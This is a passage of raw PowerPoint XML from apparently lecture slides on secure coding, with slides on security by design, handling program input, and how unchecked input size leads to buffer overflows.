                  <a:pt x="54102" y="267462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83058" y="238506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148590" y="238506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214122" y="229362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222504" y="219605"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="260350" h="304164">
                <a:moveTo>
                  <a:pt x="259841" y="176147"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="259841" y="55391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250698" y="25146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163764" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152461" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83058" y="17526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64008" y="63246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92964" y="80772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119634" y="63246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158496" y="54102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195072" y="54102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222504" y="80772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222504" y="219605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259841" y="176147"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5412485" y="2475738"/>
            <a:ext cx="68579" cy="67055"/>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12" name="object 12"/>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44</a:t>
            </a:fld>
            <a:endParaRPr sz="1400">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328670" y="1006855"/>
            <a:ext cx="3400425" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Security by</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Design</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="1925065"/>
            <a:ext cx="7851140" cy="4544060"/>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3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Security and reliability are common design goals  in most engineering</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>disciplines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society not </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tolerant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of bridge/plane etc</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-85" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>failures</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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Software </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>development is not as</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>mature</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much higher failure levels</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tolerated</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="1844675" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="715"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Despite having a number of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>software  development and quality</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>standards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main focus </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>general development</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-85" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lifecycle</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increasingly identify </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>security as </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-90" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>goal</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5</a:t>
            </a:fld>
            <a:endParaRPr sz="1400">
              <a:latin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881376" y="1006855"/>
            <a:ext cx="4295775" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Handling </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Program</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="1986025"/>
            <a:ext cx="7936865" cy="3701415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="104139" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Incorrect handling a very common</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-30" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>failing</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="720"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Input is any </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>source </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of data from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>outside</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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>data read from keyboard, file,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-95" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>network</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also </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>execution </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>environment, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-105" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="715"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Must identify all data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sources…</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="720"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>…and explicitly validate assumptions on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>size </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and  type of values before</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>use</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6</a:t>
            </a:fld>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs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286254" y="1006855"/>
            <a:ext cx="5485765" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Input </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Size </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>and Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="1832874"/>
            <a:ext cx="7291705" cy="4233545"/>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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Often there are assumptions about </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-95" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>size</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i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>input is only a line of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-125" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>text</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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>size </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>accordingly </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>but fail </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>verify</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-65" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>size</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="675"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>resulting in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-30" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>overflow</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spc="-35" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>may not identify</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="35" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>vulnerability</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since focus on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>“normal, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>expected”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-90" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>inputs</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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Safe coding treats all input as</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-45" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dangerous</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="680"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hence </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>must </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>process so </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>as to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>protect</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>program</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7</a:t>
            </a:fld>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs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068066" y="1006855"/>
            <a:ext cx="3923029" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Interpretation of</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="1909074"/>
            <a:ext cx="7697470" cy="4494530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
